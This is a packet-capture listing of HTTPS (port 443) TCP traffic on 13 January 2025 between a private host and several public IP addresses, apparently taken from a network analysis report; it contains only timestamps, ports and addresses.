                                                                  Jan 13, 2025 22:52:28.835566044 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.835572004 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.842631102 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.854011059 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.854247093 CET49759443192.168.2.4151.101.130.137
                                                                  Jan 13, 2025 22:52:28.854310989 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.855334044 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.855403900 CET49759443192.168.2.4151.101.130.137
                                                                  Jan 13, 2025 22:52:28.855766058 CET49759443192.168.2.4151.101.130.137
                                                                  Jan 13, 2025 22:52:28.855833054 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.856018066 CET49759443192.168.2.4151.101.130.137
                                                                  Jan 13, 2025 22:52:28.856035948 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.889261007 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.905411005 CET49759443192.168.2.4151.101.130.137
                                                                  Jan 13, 2025 22:52:28.920448065 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.920496941 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.920521975 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.920563936 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.920571089 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.920733929 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.921087027 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.921124935 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.921196938 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.921201944 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.921627045 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.921657085 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.921668053 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.921675920 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.921710968 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.921724081 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.922558069 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.922586918 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.922606945 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.922611952 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.922645092 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.922650099 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.922693014 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.922723055 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.922733068 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.922739983 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.922775984 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.923490047 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.923532009 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.923556089 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.923595905 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.923602104 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.924000025 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.935352087 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.935477018 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.935527086 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.935535908 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.935626984 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.935671091 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.935677052 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.935782909 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.935825109 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.935831070 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.935931921 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.935981035 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.935987949 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.936088085 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.936172009 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.936217070 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.936223030 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.936260939 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.939898014 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.957134962 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.966043949 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.966146946 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.966289043 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.966569901 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.966583967 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.973236084 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.973248005 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.973263025 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.973329067 CET49759443192.168.2.4151.101.130.137
                                                                  Jan 13, 2025 22:52:28.973376989 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.973423958 CET49759443192.168.2.4151.101.130.137
                                                                  Jan 13, 2025 22:52:28.973448992 CET49759443192.168.2.4151.101.130.137
                                                                  Jan 13, 2025 22:52:28.981096029 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:28.981121063 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.981188059 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:28.981956005 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:28.981965065 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.990331888 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:29.011162043 CET49762443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.011220932 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.011296988 CET49762443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.011468887 CET49762443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.011499882 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.036112070 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.036317110 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.036370039 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:29.036380053 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.036475897 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.036525011 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:29.036530972 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.036626101 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.036700964 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.036734104 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:29.036741018 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.036777973 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:29.036788940 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.036940098 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.036992073 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:29.036998034 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.037091017 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.037173986 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.037214041 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:29.037220955 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.037257910 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:29.037262917 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.037395954 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.037478924 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.037481070 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:29.037506104 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.037565947 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:29.038108110 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.038242102 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.038295031 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:29.038300991 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.038402081 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.038454056 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:29.038469076 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.038547039 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.038592100 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:29.038598061 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.038759947 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.038928032 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:29.039117098 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:29.039129019 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:29.049139977 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:29.049161911 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:29.049235106 CET49759443192.168.2.4151.101.130.137
                                                                  Jan 13, 2025 22:52:29.049262047 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:29.050046921 CET49759443192.168.2.4151.101.130.137
                                                                  Jan 13, 2025 22:52:29.050730944 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:29.050750017 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:29.050812960 CET49759443192.168.2.4151.101.130.137
                                                                  Jan 13, 2025 22:52:29.050843954 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:29.051028013 CET49759443192.168.2.4151.101.130.137
                                                                  Jan 13, 2025 22:52:29.139549017 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:29.139570951 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:29.139662027 CET49759443192.168.2.4151.101.130.137
                                                                  Jan 13, 2025 22:52:29.139728069 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:29.140062094 CET49759443192.168.2.4151.101.130.137
                                                                  Jan 13, 2025 22:52:29.140446901 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:29.140461922 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:29.140546083 CET49759443192.168.2.4151.101.130.137
                                                                  Jan 13, 2025 22:52:29.140559912 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:29.140611887 CET49759443192.168.2.4151.101.130.137
                                                                  Jan 13, 2025 22:52:29.141130924 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:29.141208887 CET49759443192.168.2.4151.101.130.137
                                                                  Jan 13, 2025 22:52:29.141222000 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:29.141246080 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:29.141299963 CET49759443192.168.2.4151.101.130.137
                                                                  Jan 13, 2025 22:52:29.141755104 CET49759443192.168.2.4151.101.130.137
                                                                  Jan 13, 2025 22:52:29.141783953 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:29.454068899 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.454283953 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.454293966 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.455761909 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.455817938 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.456129074 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.456213951 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.456229925 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.485476971 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.485805988 CET49762443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.485868931 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.487303972 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.487459898 CET49762443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.487636089 CET49762443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.487723112 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.487736940 CET49762443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.503336906 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.506165028 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.506175995 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.535332918 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.537899971 CET49762443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.537959099 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.553039074 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.583595037 CET49762443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.595603943 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.595654011 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.595679998 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.595705986 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.595721006 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.595880032 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.595885038 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.596168995 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.596194983 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.596237898 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.596419096 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.596425056 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.596471071 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.596844912 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.597779036 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.597784996 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.635649920 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.635879040 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.635941029 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.636017084 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.636065960 CET49762443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.636081934 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.636100054 CET49762443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.636168003 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.636290073 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.636354923 CET49762443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.636363029 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.636399031 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.636430979 CET49762443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.640111923 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.640196085 CET49762443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.640217066 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.651854038 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.651861906 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.684447050 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.684534073 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.684612989 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.684891939 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.684911013 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.685266972 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.685307980 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.685323000 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.685353041 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.685380936 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.685476065 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.685482025 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.685533047 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.686083078 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.686476946 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.686503887 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.686532021 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.686556101 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.686572075 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.686572075 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.686578035 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.686714888 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.687269926 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.687309027 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.687346935 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.687396049 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.687418938 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.687424898 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.687442064 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.687448025 CET49762443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.688302040 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.688334942 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.688361883 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.688389063 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.688407898 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.688407898 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.688414097 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.688458920 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.688463926 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.689219952 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.689291954 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.689302921 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.689348936 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.699727058 CET49761443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:29.699749947 CET44349761104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.722002029 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.722189903 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.722279072 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.722342014 CET49762443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.722368002 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.722420931 CET49762443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.722438097 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.722527981 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.722578049 CET49762443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.722592115 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.722681046 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.722743988 CET49762443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.722755909 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.722903013 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:29.722953081 CET49762443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.723397970 CET49762443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:29.723426104 CET44349762104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.047107935 CET49766443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.047172070 CET44349766104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.047529936 CET49766443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.047771931 CET49766443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.047794104 CET44349766104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.136899948 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.137236118 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.137306929 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.137787104 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.138079882 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.138176918 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.138292074 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.179346085 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.284001112 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.284053087 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.284090042 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.284123898 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.284141064 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.284157991 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.284173012 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.284177065 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.284205914 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.284215927 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.284272909 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.284306049 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.284310102 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.284321070 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.284359932 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.284374952 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.288650990 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.288883924 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.288892031 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.333826065 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.370047092 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.370116949 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.370151997 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.370202065 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.370234013 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.370270014 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.370476961 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.370532990 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.370568037 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.370573997 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.370583057 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.370615959 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.370624065 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.371520996 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.371553898 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.371562004 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.371568918 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.371611118 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.371617079 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.371624947 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.371656895 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.371664047 CET44349764104.18.94.41192.168.2.4
